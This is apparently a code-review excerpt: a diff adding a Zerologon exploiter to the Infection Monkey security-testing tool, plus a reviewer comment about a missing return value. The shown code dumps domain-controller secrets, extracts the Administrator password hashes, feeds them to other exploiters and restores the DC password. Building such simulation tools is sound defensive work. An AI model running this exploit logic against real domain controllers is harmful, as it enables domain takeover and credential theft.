monkey/infection_monkey/exploit/zerologon.py

```diff
@@ -0,0 +1,743 @@
+        admin_pwd_hashes = self.get_admin_pwd_hashes()
+
+        try:
+            if not admin_pwd_hashes:
+                raise Exception("Couldn't extract admin password's hashes.")
+
+            LOG.debug("Getting original DC password's nthash.")
+            original_pwd_nthash = self.get_original_pwd_nthash(admin_pwd_hashes)
+            if not original_pwd_nthash:
+                raise Exception("Couldn't extract original DC password's nthash.")
+
+            # Keep authenticating until successful.
+            LOG.debug("Attempting password restoration.")
+            for _ in range(0, self.MAX_ATTEMPTS):
+                rpc_con = self.attempt_restoration(original_pwd_nthash)
+                if rpc_con is not None:
+                    break
+
+            if rpc_con:
+                LOG.debug("DC machine account password should be restored to its original value.")
+                return True
+            else:
+                raise Exception("Failed to restore password! Max attempts exceeded?")
+
+        except Exception as e:
+            LOG.error(e)
+
+    def get_admin_pwd_hashes(self):
+        options = self.OPTIONS_FOR_SECRETSDUMP.copy()
+        options['target'] = '$@'.join([self.dc_name, self.dc_ip])  # format for DC account - "NetBIOSName$@0.0.0.0"
+        options['target_ip'] = self.dc_ip
+        options['dc_ip'] = self.dc_ip
+
+        dumped_secrets = self.get_dumped_secrets(options=options,
+                                                 remote_name=self.dc_ip,
+                                                 username=f"{self.dc_name}$")
+        user = 'Administrator'
+        for secret in dumped_secrets:
+            if user in secret:
+                hashes = secret.split(':')[2:4]  # format of secret - "domain\uid:rid:lmhash:nthash:::"
+                self.add_extracted_creds_to_exploit_info(user, hashes[0], hashes[1])
+                self.add_extracted_creds_to_monkey_config(user, hashes[0], hashes[1])
+                return ':'.join(hashes)  # format - "lmhash:nthash"
+
+    def add_extracted_creds_to_exploit_info(self, user, lmhash, nthash):
+        self.exploit_info['credentials'].update({
+            user: {
+                'username': user,
+                'password': '',
+                'lm_hash': lmhash,
+                'ntlm_hash': nthash
+            }
+        })
+
+    def add_extracted_creds_to_monkey_config(self, user, lmhash, nthash):  # so other exploiters can use these creds
+        if user not in self._config.exploit_user_list:
+            self._config.exploit_user_list.append(user)
+
+        if lmhash not in self._config.exploit_lm_hash_list:
+            self._config.exploit_lm_hash_list.append(lmhash)
+
+        if nthash not in self._config.exploit_ntlm_hash_list:
+            self._config.exploit_ntlm_hash_list.append(nthash)
+
+    def get_original_pwd_nthash(self, admin_pwd_hashes):
+        if not self.save_HKLM_keys_locally(admin_pwd_hashes):
```

Comment:
We should probably specifically return False somewhere in the code of `self.save_HKLM_keys_locally` if we expect it here